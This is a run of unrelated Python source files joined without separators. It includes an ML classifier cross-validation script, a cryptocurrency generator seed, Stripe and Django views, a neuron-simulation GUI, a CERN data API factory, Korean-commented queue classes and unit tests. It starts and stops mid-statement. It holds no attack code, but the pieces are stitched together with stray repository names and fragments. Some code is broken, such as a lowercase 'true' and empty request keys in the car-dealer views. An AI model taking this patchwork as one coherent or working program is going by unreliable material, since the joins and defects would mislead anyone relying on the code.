learn_all_boyou.RandomForestClassifier(max_depth=100, min_samples_split=12,\ # min_samples_leaf=12, \ # n_estimators=100, max_features=None,\ # random_state=int(round(time.time()))), \ # learn_all_boyou.AdaBoostClassifier(algorithm='SAMME.R', n_estimators=200, \ # random_state=int(round(time.time()))),\ # learn_all_boyou.GaussianNB(priors=[0.5, 0.5]),\ # learn_all_boyou.MLPClassifier(hidden_layer_sizes=(100,100,100,100), \ # alpha=100, solver='lbfgs',\ # max_iter=max_iterations,\ # activation='tanh', tol=1e-5,\ # warm_start='True') \ # #### LogisticRegression(penalty='l2', tol=1e-4, C=1e2,\ # #### fit_intercept=True, solver='lbfgs', \ # #### class_weight='balanced', max_iter=max_iterations), \ # #### SVC(kernel="linear", C=1e2, tol=1e-4, max_iter=max_iterations,\ # #### probability= True),\ # #### SVC(kernel="rbf", C=1e2, tol=1e-4, max_iter=max_iterations,\ # #### probability=True, shrinking=True), # #### SVC(kernel="poly", C=1e2, degree=4, tol=1e-4,\ # #### max_iter=max_iterations, probability=True),\ # #### SVC(kernel="sigmoid", C=1e2, gamma=1e-1, tol=1e-3, \ # #### max_iter=max_iterations, probability=True, \ # #### shrinking=True)#,\ # #### GaussianProcessClassifier(1.0 * RBF(1.0), n_jobs=-1, \ # #### copy_X_train=False, \ # #### max_iter_predict=100, warm_start=False )\ # ] self.classifiers = list(\ itertools.chain(\ [learn_all_boyou.KNeighborsClassifier(\ n_neighbors=parameter_i, \ weights='uniform', \ algorithm='auto', \ n_jobs=-1) \ for parameter_i in list(xrange(38, 68, 3))],\ [learn_all_boyou.DecisionTreeClassifier(\ max_depth=parameter_i, \ min_samples_split=12, \ min_samples_leaf=12,\ presort=True, max_features=None,\ random_state=int(round(time.time()))) \ for parameter_i in list(xrange(35, 45, 1))],\ [learn_all_boyou.RandomForestClassifier(\ max_depth=parameter_i, \ min_samples_split=12,\ min_samples_leaf=12, \ n_estimators=100, max_features=None,\ random_state=int(round(time.time()))) \ for parameter_i in list(xrange(30, 40, 1))],\ [learn_all_boyou.AdaBoostClassifier(\ algorithm='SAMME.R', \ n_estimators=parameter_i, \ random_state=int(round(time.time()))) for parameter_i in list(xrange(300, 1300, 100))],\ [learn_all_boyou.GaussianNB(\ priors=[0.5, 0.5])],\ [learn_all_boyou.MLPClassifier(\ hidden_layer_sizes=(parameter_i,parameter_i,parameter_i), \ alpha = 5, \ solver='lbfgs',\ max_iter=max_iterations,\ activation='tanh', tol=1e-5,\ warm_start='True') \ for parameter_i in list(xrange(3, 53, 5))]\ )\ ) self.names = list (\ itertools.chain(\ ["Nearest Neighbors: " + \ json.dumps(self.classifiers[parameter_i].get_params()) \ for parameter_i in list(xrange(0, 10))],\ ["Decision Tree: " + \ json.dumps(self.classifiers[parameter_i].get_params()) \ for parameter_i in list(xrange(10, 20))],\ ["Random Forest: " + \ json.dumps(self.classifiers[parameter_i].get_params()) \ for parameter_i in list(xrange(20, 30))],\ ["AdaBoost: " + \ json.dumps(self.classifiers[parameter_i].get_params()) \ for parameter_i in list(xrange(30, 40))],\ ["Naive Bayes: " + \ json.dumps(self.classifiers[40].get_params())], \ ["Neural Net: " + \ json.dumps(self.classifiers[parameter_i].get_params()) \ for parameter_i in list(xrange(41, 51))]\ )\ ) def classic_cross_validation(self): """ This function does 10 fold split for self.data and its label :class:`learn_all_boyou`. Data and label will be shuffled. The data and label is splited with granularity of single feature vector. :param dict self.report: simulation report dictionary :param array self.X_train: Training array :param array self.X_test: Testing array :param array self.y_train: Training label :param array self.y_test: Testing label :param list prediction: prediction results :param list predict_proba: prediction confidence """ self.logger.info('Start to cross validate ...') self.load_data() self.setup_classifiers() self.report = {} # random shuffling zipped_list = zip(self.data, self.label) random.shuffle(zipped_list) self.data, self.label = zip(*zipped_list) self.data = np.array(list(self.data)) self.label = np.array(list(self.label)) # 10 fold split cv = StratifiedKFold(n_splits = 10) experiment_path = self.result_path zipped_clfs = zip(self.names, self.classifiers) #for names, clf in zip(self.names, self.classifiers): names, clf = zipped_clfs[int(sys.argv[1].split('/')[-1])] self.logger.info(names + " in process ....") count = 0 for train_idx, test_idx in cv.split(self.data, self.label): self.X_train, self.X_test = self.data[train_idx], self.data[test_idx] self.y_train, self.y_test = self.label[train_idx], self.label[test_idx] clf.fit(self.X_train, self.y_train) self.result_path = experiment_path + str(count) + '/' count += 1 if not os.path.isdir(self.result_path): self.logger.info(self.result_path + " new folder created ....") os.mkdir(self.result_path) else: self.logger.info(self.result_path + " old directory exists ....") if os.path.isfile(self.result_path + 'classification_report.txt'): self.logger.info(self.result_path + " old report exists ....") with open(self.result_path + 'classification_report.txt', 'r') as outfile: self.report = json.load(outfile) outfile.close() self.prediction = clf.predict(self.X_test) self.text_class_report(names) self.predict_proba = clf.predict_proba(self.X_test) self.roc_curve_report(names) self.logger.info(names + " testing completed!") if __name__ == "__main__": logger = logging.getLogger() logger.setLevel(logging.DEBUG) logger_handler = logging.StreamHandler() logger_handler.setFormatter(\ logging.Formatter('%(asctime)s [%(levelname)s]\ %(filename)s [%(lineno)d]: %(funcName)s(): %(message)s')) logger.addHandler(logger_handler) learn1 = learn_1k_cv_optimization(logger, \ data_path_prefix='../amd_data/') #data_path_prefix='/home/bobzhou/2017_summer/data_analysis/amd_data_analysis/') learn1.result_path = sys.argv[1] + '/' logger.info("files will be saved in the following path: " + learn1.result_path) #learn1.run() learn1.classic_cross_validation() #learn1.test_rasoul() from secp256k1_zkp import GeneratorOnCurve from hashlib import sha256 seed = "Leer is experimental cryptocurrency implementing LubbaDubDub technology" def generator_from_string_seed(seed): m=sha256() m.update(seed.encode()) bytes_seed = m.digest() g = GeneratorOnCurve() g._from_seed(bytes_seed) g.initialise_bulletproof_generators(128) return g default_generator = generator_from_string_seed(seed) default_generator_ser=default_generator.serialize() generators = { default_generator_ser: default_generator} import sys import collections as _abc class range_iterator(object): __slots__ = ('_start', '_max_idx', '_step', '_current') def __init__(self, start, step, count, current=-1): """ Iterator over a `range`, for internal use only Argument `current` used for pickle support. """ self._start = start self._step = step self._max_idx = count - 1 self._current = current def __iter__(self): return self def _next(self): if self._current == self._max_idx: raise StopIteration self._current += 1 return self._start + self._step * self._current if sys.version_info < (3,): next = _next else: __next__ = _next def __length_hint__(self): # both stop and current are offset by 1 which cancels out here return self._max_idx - self._current # Pickling def __getstate__(self): return self._start, self._max_idx, self._step, self._current def __setstate__(self, state): self._start, self._max_idx, self._step, self._current = state # register at ABCs # do not use decorators to play nice with Cython _abc.Iterator.register(range_iterator) class Solution: def restoreIpAddresses(self, s: str) -> List[str]: valid_addresses = [] def is_legal_part(string): return 0 <= int(string) <= 255 and not (string[0] == '0' and len(string) > 1) for i in range(1, min(4, len(s))): for j in range(i + 1, min(i + 4, len(s))): for k in range(j + 1, min(i + j + 4, len(s))): if is_legal_part(s[:i]) and is_legal_part(s[i:j]) and is_legal_part(s[j:k]) and is_legal_part(s[k:]): valid_addresses.append('.'.join([s[:i], s[i:j], s[j:k], s[k:]])) return valid_addresses 0 """ Script for converting Budget pdfs Usage: converter.py --idir= [--odir=] [--fformat=] Options: --idir= Provide input directory that has all pdfs --odir= Provide output directory that should have the output files --fformat= Provide the output format, eg: txt, xml, html """ from docopt import docopt import subprocess import os if __name__ == "__main__": args = docopt(__doc__) idir = args["--idir"] odir = args["--odir"] fformat = args["--fformat"] if not fformat: fformat = "txt" for filename in os.listdir(idir): if filename.endswith(".pdf"): ofile = filename.split(".")[0] + "." + fformat if odir: ofile = odir + ofile ifile = idir + filename subprocess.call(['pdf2txt.py', "-o", ofile, ifile]) from django.conf import settings from django.shortcuts import render from rest_framework.decorators import api_view from rest_framework.response import Response from rest_framework import status import stripe import json import os # Create your views here. # payments/views.py stripe.api_key = '' @api_view(['POST']) def test_payment(request): test_payment_intent = stripe.PaymentIntent.create( amount=10000, currency='pln', payment_method_types=['card'], receipt_email='') return Response(status=status.HTTP_200_OK, data=test_payment_intent) @api_view(['POST']) def create_checkout_session(request): try: session = stripe.checkout.Session.create( payment_method_types=['card'], line_items=[{ 'price_data': { 'currency': 'usd', 'product_data': { 'name': 'Private Registration', }, 'unit_amount': 10000, }, 'quantity': 1, }], mode='payment', success_url=os.path.join(settings.SERVER_ADDRESS, 'dashboard'), cancel_url=os.path.join(settings.SERVER_ADDRESS, 'cancel'), ) except Exception as e: print(e) return Response({ 'id': session.id }, status=status.HTTP_200_OK)""" Graphical interface for controlling single *conductance-based* neuron behavior. Neuron consists of 4 conductance elements with single activation variables representing fast -ve, slow +ve, slow -ve, and ultra-slow +ve conductance. @author: Luka """ from gui_utilities import GUI from neuron_model import Neuron # Initial conductance parameters g1 = 0 E_rev1 = 30 # 'sodium' voff1 = -20 k1 = 0.1 g2 = 0 E_rev2 = -75 # 'potassium' voff2 = -20 k2 = 0.1 g3 = 0 E_rev3 = 140 # 'calcium' voff3 = -50 k3 = 0.15 g4 = 0 E_rev4 = -75 # 'potassium' voff4 = -50 k4 = 0.15 # Define timescales tf = 0 ts = 30 tus = 20*20 # Define an empty neuron and then interconnect the elements neuron = Neuron() R = neuron.add_conductance(1) i1 = neuron.add_conductance(g1, E_rev1) x1 = i1.add_gate(k1, voff1, tf) i2 = neuron.add_conductance(g2, E_rev2) x2 = i2.add_gate(k2, voff2, ts) i3 = neuron.add_conductance(g3, E_rev3) x3 = i3.add_gate(k3, voff3, ts) i4 = neuron.add_conductance(g4, E_rev4) x4 = i4.add_gate(k4, voff4, tus) gui = GUI(neuron, i0 = -50, vmin = -100, vmax = 20, dv = 1.0, time_step = 0.1, plot_fixed_point = True, ymin = -120, ymax = 20, sstep=10, tint=3000) gui.add_sim_plot([0.1, 0.45, 0.8, 0.2]) gui.add_IV_curve(neuron, "Fast", tf, [0.1, 0.75, 0.2, 0.2]) gui.add_IV_curve(neuron, "Slow", ts, [0.4, 0.75, 0.2, 0.2]) gui.add_IV_curve(neuron, "Ultraslow", tus, [0.7, 0.75, 0.2, 0.2]) gui.add_label(0.25, 0.34, "Fast -ve") s1 = gui.add_slider("$g_{max}$", [0.1, 0.3, 0.3, 0.03], 0, 10, g1, i1.update_g_max) s2 = gui.add_slider("$V_{off}$", [0.1, 0.25, 0.3, 0.03], -75, 0, voff1, x1.update_voff) gui.add_label(0.25, 0.19, "Slow +ve") s3 = gui.add_slider("$g_{max}$", [0.1, 0.15, 0.3, 0.03], 0, 10, g2, i2.update_g_max) s4 = gui.add_slider("$V_{off}$", [0.1, 0.1, 0.3, 0.03], -75, 0, voff2, x2.update_voff) gui.add_label(0.75, 0.34, "Slow -ve") s5 = gui.add_slider("$g_{max}$", [0.6, 0.3, 0.3, 0.03], 0, 10, g3, i3.update_g_max) s6 = gui.add_slider("$V_{off}$", [0.6, 0.25, 0.3, 0.03], -75, 0, voff3, x3.update_voff) gui.add_label(0.75, 0.19, "UltraSlow +ve") s7 = gui.add_slider("$g_{max}$", [0.6, 0.15, 0.3, 0.03], 0, 10, g4, i4.update_g_max) s8 = gui.add_slider("$V_{off}$", [0.6, 0.1, 0.3, 0.03], -75, 0, voff4, x4.update_voff) s9 = gui.add_iapp_slider([0.1, 0.02, 0.5, 0.03], -100, 0) b = gui.add_button("Pause", [0.8, 0.02, 0.1, 0.03], gui.pause) gui.run()Thrayz/agfzb-CloudAppDevelopment_Capstone from django.shortcuts import render from django.http import HttpResponseRedirect, HttpResponse from django.contrib.auth.models import User from django.shortcuts import get_object_or_404, render, redirect from .models import CarDealer, CarMake, CarModel from .restapis import get_dealers_from_cf, get_dealer_reviews_from_cf from django.contrib.auth import login, logout, authenticate from django.contrib import messages from datetime import datetime import logging import json # Get an instance of a logger logger = logging.getLogger(__name__) # Create your views here. def index(request): return render(request, 'djangoapp/index.html') # Create an `about` view to render a static about page def about(request): return render(request,'djangoapp/about.html') # Create a `contact` view to return a static contact page def contact(request): return render(request, 'djangoapp/contact.html' ) # Create a `login_request` view to handle sign in request def login_request(request): if request.method== "POST": username=request.POST['username'] password=request.POST[''] user=authenticate(username=username,password=password) if user is not None: login(request,user) return redirect('djangoapp:index') else: return render(request, 'djangoapp/registration.html', {}) # Create a `logout_request` view to handle sign out request def logout_request(request): print("Log out the user `{}`".format(request.user.username)) logout(request) return redirect('djangoapp:index') # Create a `registration_request` view to handle sign up request def registration_request(request): if request.method=="GET": return render(request,'djangoapp/registration.html',{}) elif request.method=="POST": username = request.POST['username'] password = request.POST[''] first_name = request.POST['firstname'] last_name = request.POST['lastname'] user_exist = False try: User.objects.get(username=username) user_exist=true except : logger.debug("{} is new user".format(username)) if not user_exist: # Create user in auth_user table user = User.objects.create_user(username=username, first_name=first_name, last_name=last_name, password=password) login(request, user) return redirect('djangoapp:index') else: return render(request, 'djangoapp/registration.html', {}) # Update the `get_dealerships` view to render the index page with a list of dealerships def get_dealerships(request): if request.method == "GET": context = {} url = "https://cf61a9d5.eu-gb.apigw.appdomain.cloud/dealerships/dealerships" # Get dealers from the URL dealerships_list = get_dealers_from_cf(url) # Concat all dealer's short name # Return a list of dealer short name context = {"dealerships_list": dealerships_list} return render(request, 'djangoapp/index.html', context) # Create a `get_dealer_details` view to render the reviews of a dealer def get_dealer_details(request, dealer_id): if request.method == "GET": url = "https://cf61a9d5.eu-gb.apigw.appdomain.cloud/get_reviews/get_reviews?dealerId=" + \ str(dealer_id) # Get dealers from the URL reviews_list = get_dealer_reviews_from_cf(url) # Concat all dealer's short name context = {"reviews_list": reviews_list, "dealer_id": dealer_id} return render(request, 'djangoapp/dealer_details.html', context) # Create a `add_review` view to submit a review # def add_review(request, dealer_id): # ... from __future__ import print_function from dbs.apis.dbsClient import DbsApi from DataProvider.core.dbs_provider import DBSDataProvider from DataProvider.core.phedex_provider import PhedexDataProvider class DBS3ApiFactory(object): def __init__(self, config): self.config = config or {} def get_api(self): return DbsApi(url=self.config.get("url", "https://cmsweb.cern.ch:8443/dbs/int/global/DBSReader/")) class DBSDataProvider(object): def __init__(self, config): self.config = config or {} def get_api(self): return DBSDataProvider(**self.config) class PhedexDataProvider(object): def __init__(self, config): self.config = config or {} def get_api(self): return PhedexDataProvider() def create_api(api="DbsApi", config=None): known_factory = {'DbsApi': DBS3ApiFactory(config), 'DBSDataProvider': DBSDataProvider(config), 'PhedexDataProvider': PhedexDataProvider(config)} factory = known_factory.get(api, None) if not factory: raise NotImplementedError("A factory for api %s has not yet been implemented." % (api)) return factory.get_api() if __name__ == "__main__": api = create_api(api="DbsApi", config=dict(url="https://cmsweb.cern.ch:8443/dbs/int/global/DBSReader/")) print(dir(api)) test_actors_labelisation.py import unittest from actors_labelisation import imputation_previous_value,labelisation import fonction_traitement as trait import pandas as pd from numpy import nan as Nan import numpy as np #dataframes building for tests movie_ratings = pd.read_csv(r'Data_csv\movie_ratings_full.csv') movie_ratings = trait.clean_dataframe(movie_ratings,3,4,5,6,7,8) movie_ratings = movie_ratings[:3] list_nan = [] for x in range(len(movie_ratings.columns)): if movie_ratings.columns[x] == 'genres1': list_nan.append('TEST') else: list_nan.append(Nan) columns = movie_ratings.columns.values.tolist() s2 = pd.Series(list_nan, index=columns) movie_ratings_nan = movie_ratings.append(s2,ignore_index=True) class Test_actors_labelisation(unittest.TestCase): def test_imputation_previous_value(self): # Given n = movie_ratings_nan #movie_ratings_nan['genres2'][3] = 'TEST' #movie_ratings_nan['genres3'][3] = 'TEST' expected_output1 = 'TEST' expected_output2 = 'TEST' # When output1 = imputation_previous_value(n)['genres2'][3] output2 = imputation_previous_value(n)['genres3'][3] # Then self.assertEqual(expected_output1, output1) self.assertEqual(expected_output2, output2) 1-10 # 순서에 관여하는 클래스 from . import utils from .log_gongik import Logger from .file_property import FileProp class QueueReadOnly(object): # 읽기 전용 큐 _setInstance4InitParent = set() _dctInstance4New = {} def __new__(cls, queueName:str, *args): if queueName in cls._dctInstance4New: return cls._dctInstance4New[queueName] cls.log = Logger() cls._instance = super().__new__(cls) cls._dctInstance4New[queueName] = cls._instance cls.log.INFO(cls._instance) return cls._instance def __init__(self, queueName:str, tplElements: tuple[str]): if queueName not in self._setInstance4InitParent: self._name = queueName self._lstQueue = [None] * len(tplElements) self._queueSize = len(tplElements) self._insertPoint = 0 self._refPoint = 0 self.log = Logger() self._setInstance4InitParent.add(queueName) def __str__(self) -> str: return self._name if hasattr(self, '_name') else super().__str__() #초기화시 큐에 데이터를 집어넣는다. def _push(self, value) -> bool: nextInsPoint = (self._insertPoint+1) % self._queueSize if self.isOverflow(): self.log.WARNING("Queue Full") return False self._lstQueue[self._insertPoint] = value # 테일포인터가 가르키는 자리에 value삽입 self._insertPoint = nextInsPoint # 다음 자리로 테일포인터 이동. return True #큐에서 데이터를 빼고(함수 앞에서 getHead로) 헤드포인트를 옮긴다. def view_next(self) -> object: nextRefPoint = (self._refPoint+1) % self._queueSize self._refPoint = nextRefPoint return self._lstQueue[self._refPoint] def view_previous(self) -> object: prevRefPoint = self._queueSize-1 if self._refPoint == 0 else self._refPoint-1 self._refPoint = prevRefPoint return self._lstQueue[self._refPoint] def refresh(self) -> object: try: for idx, ele in enumerate(self._lstQueue): self.log.DEBUG(f'{idx} : {ele.name}') return self._lstQueue[self._refPoint] except IndexError as ie: self.log.WARNING(ie, '/ calling invalid refPoint') self._refPoint = len(self._lstQueue) -1 return self._lstQueue[-1] # get oldest push @property def current_preview(self): try: return self._lstQueue[self._refPoint] except IndexError as ie: self.log.WARNING(ie, '/ calling invalid refPoint') self._refPoint = len(self._lstQueue) -1 return self._lstQueue[-1] @property def current_pos(self) -> int: return self._refPoint + 1 @property def size(self) -> int: return sum(bool(file) for file in self.queue) @property def name(self) -> str: return self._name @property def queue(self) -> list: return self._lstQueue def isEmpty(self) -> bool: return self._refPoint == self._insertPoint def isOverflow(self) -> bool: return False if self.isEmpty() else self._insertPoint == 0 def add(self, loc, name) -> bool: raise NotImplementedError() def detach(self, loc, name) -> bool: raise NotImplementedError() class MstQueue(QueueReadOnly): # 분류해서 집어넣음 def __new__(cls, *args): if not hasattr(cls, '_instance'): cls._instance = super().__new__(cls, 'master') cls.log.INFO('calling singleton queue:', cls._instance) return cls._instance def __init__(self): cls = type(self) if not hasattr(cls, '_init'): dctLoc2Names = utils.invert_dict(FileProp.name2AddrDBCorrected()) #도로명주소를 기준으로 정렬 후 초기화 tplSingleLocQueeue = tuple(( PropsQueue(correctedLocDB, tuple(nameLst)) for correctedLocDB, nameLst in dctLoc2Names.items() )) # 여기서 loc변수는 유일, 이미 보정된 위치 이름(DB-도로명주소 기준) super().__init__('master', tplSingleLocQueeue) self._lstQueue: list[PropsQueue] = [None] * len(tplSingleLocQueeue) self._queueSize = len(tplSingleLocQueeue) for element in tplSingleLocQueeue: self._push(element) self.log.INFO(f'MstQueue init, size = {self.size}, queue = {self.queue}') cls._init = True @classmethod def is_init(cls): return hasattr(cls, '_init') @property def total_size(self): ret = 0 try: for file in self.queue: file:PropsQueue ret += file.size except Exception as e: self.log.ERROR(e, '/ while getting total number') return -1 return ret def add(self, locationKey, fNameKey) -> bool: try: targetIdx = self._lstQueue.index(PropsQueue(locationKey)) # 마스터 큐에 위치한 장소큐의 위치를 찾는다 self._lstQueue[targetIdx].append_props(FileProp(fNameKey)) # 찾은 위치에 props 객체 삽입 except ValueError as ve: self.log.ERROR(ve) return 1 return 0 #나중에 모두 더해서 실행 결과 피드백을 준다 def remove_location(self, instance: QueueReadOnly) -> bool: if not self._lstQueue: return 1 try: self._lstQueue.remove(instance) #propsQueue객체를 제거 self.log.INFO(instance.name, 'removed from', self.name) except ValueError as ve: self.log.ERROR(ve) return 2 self._queueSize -= 1 return 0 def new(self, location: str, tplNames: tuple[str]): for name in tplNames: if FileProp(name).locationFmDB == location: for fName in tplNames: # 추가 전 위치 보정(보통은 초기화 때 보정되는데 나중에 추가되는 애들은 그렇지 않음) fProps = FileProp(fName) fProps.correct_address(dbAddr=location, apiAddr=FileProp(name).locationFmAPI) self.log.INFO(fName, 'Location Updated,', fProps.locationFmDB, 'to', location) break self._lstQueue.append(PropsQueue(location, tplNames)) #추가한다. self._queueSize += 1 class PropsQueue(QueueReadOnly): # 이미 생성된 FileProp인스턴스를 잡아다 넣어준다. _setInstance4Init = set() def __init__(self, queueName: str, tplFileNames4Props: tuple[str]=None): if queueName not in self._setInstance4Init: if not tplFileNames4Props: self.log.ERROR('attempting to initialize PropsQueue before files init ') return # 초기화가 안됐는데 실행되면 안된다 self._queueSize = len(tplFileNames4Props) self._lstQueue = [None] * self._queueSize self._sharedDetail = '' super().__init__(queueName, tplFileNames4Props) for element in tplFileNames4Props: prop = FileProp(element) self._push(prop) if not hasattr(self, '_tplLocApiDB'): self._tplLocApiDB = prop.location4Display # 맨 처음 나오는 거 대표로 지정 prop.locationFmAPI, prop.locationFmDB = self._tplLocApiDB # 같은 큐에 있으면 같은 주소로 보여짐 self.log.INFO(f'{queueName} Queue init, size = {self.size}, queue = {self.queue}') self._setInstance4Init.add(queueName) # 도로명주소 def set_common_details(self, inputDetail): '''유저의 입력에 따라 공통 세부사항을 업데이트한다.''' for prop in self.queue: prop: FileProp prop.details = inputDetail self._sharedDetail = inputDetail def set_common_location(self, inputLocation): '''지도 입력으로부터 얻은 공통 신주소로 주소를 업데이트한다''' for prop in self.queue: prop: FileProp prop.locationFmDB = inputLocation def append_props(self, instance: FileProp): if not isinstance(instance, FileProp): self.log.ERROR(f'weired value has inserted to terminal queue {instance}, expecting FileProp instance') return instance.details = self._sharedDetail instance.correct_address(apiAddr=self._tplLocApiDB[0],dbAddr=self._tplLocApiDB[1]) self._lstQueue.append(instance) self._queueSize += 1 def remove(self, instance: FileProp) -> int: if not self._lstQueue: return 1 try: self._setInstance4Init.discard(self.name) self._setInstance4InitParent.discard(self.name) self._lstQueue.remove(instance) # list element remove self.log.INFO(instance.name, 'removed from', self.name) self.log.DEBUG(f'{self._setInstance4InitParent = }, {self._setInstance4Init}') except ValueError as ve: self.log.ERROR(ve) return 2 self._queueSize -= 1 return 0 def remove_many(self, tplNames: tuple) -> int: if not self._lstQueue: return 1 ret = 0 try: for fName in tplNames: ret += self.remove(FileProp(fName)) except Exception as e: self.log.CRITICAL(e) return ret if __name__ == '__main__': mq0 = MstQueue((1, None, 3)) mq1 = MstQueue() mq2 = MstQueue((1, 2, 3)) mq3 = PropsQueue('not master1', (1, 2, 3)) mq4 = PropsQueue('not master', (1, 2, 3)) mq5 = PropsQueue('not master2', (1, None, 3)) mq6 = PropsQueue('not master2') print(mq6) print(mq0.size) print(mq1.size)import unittest, os, shutil from cybercaptain.visualization.bar import visualization_bar TESTDATA_FOLDER = os.path.join(os.path.dirname(__file__), '../assets') TESTDATA_CHARTS_FOLDER = os.path.join(TESTDATA_FOLDER, 'chart_inputs') TESTDATA_GEN_OUTPUT_FOLDER = os.path.join(TESTDATA_FOLDER, 'output') TESTDATA_SRC_FILENAME = os.path.join(TESTDATA_CHARTS_FOLDER, 'input_data_10_counted-*.ccsf') TESTDATA_SRC_FILENAME_SINGLE = os.path.join(TESTDATA_CHARTS_FOLDER, 'input_data_10_counted-1.ccsf') TESTDATA_TARGET_FILENAME_PNG = os.path.join(TESTDATA_GEN_OUTPUT_FOLDER, 'VisualizationBarRunOut.png') TESTDATA_TARGET_FILENAME_SVG = os.path.join(TESTDATA_GEN_OUTPUT_FOLDER, 'VisualizationBarRunOut.svg') # Append Needed Args - Related to Root Config projectName / projectRoot / moduleName def append_needed_args(existing_args): return {**existing_args, 'projectRoot': TESTDATA_FOLDER, 'projectName': "UNITTEST.cckv", 'moduleName': "UNITEST_MODULE"} class VisualizationBarRunTest(unittest.TestCase): """ Test the visualization bar for the run method """ def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) def setUp(self): if not os.path.exists(TESTDATA_GEN_OUTPUT_FOLDER): os.makedirs(TESTDATA_GEN_OUTPUT_FOLDER) def tearDown(self): shutil.rmtree(TESTDATA_GEN_OUTPUT_FOLDER) def test_run(self): """ Test if the visu bar run method runs correct """ arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'groupedbarplot', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-groupedbarplot.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'groupedbarplot', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-groupedbarplot_threshold.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'groupedbarplot', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'title': 'Unittest title', 'xlabel': 'Unittest xlabel', 'ylabel': 'Unittest ylabel', 'threshold': 5, 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-groupedbarplot_threshold_lbl.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME_SINGLE, 'type': 'groupedbarplot', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-groupedbarplot_single.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'histogram', 'dataAttribute': 'grouped_value', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-histogram.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME_SINGLE, 'type': 'histogram', 'dataAttribute': 'grouped_value', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-histogram_single.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplot3d', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplot3d.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplot3d', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplot3d_thresh.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplot3d', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'colormapAscending': True, 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplot3d_ascheat.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotgroupedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotgroupedstacked.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': TESTDATA_SRC_FILENAME, 'type': 'barplotgroupedstacked', 'dataAttribute': 'grouped_value', 'groupNameAttribute': 'group_name', 'threshold': 5, 'target': TESTDATA_TARGET_FILENAME_PNG}) vb = visualization_bar(**arguments) self.assertTrue(vb.run()) self.assertTrue(os.path.isfile(TESTDATA_TARGET_FILENAME_PNG)) #self.assertTrue(open(TESTDATA_FOLDER+"/test-barplotgroupedstacked_thresh.png","rb").read() == open(TESTDATA_TARGET_FILENAME_PNG,"rb").read()) #Compare PNG arguments = append_needed_args({'src': 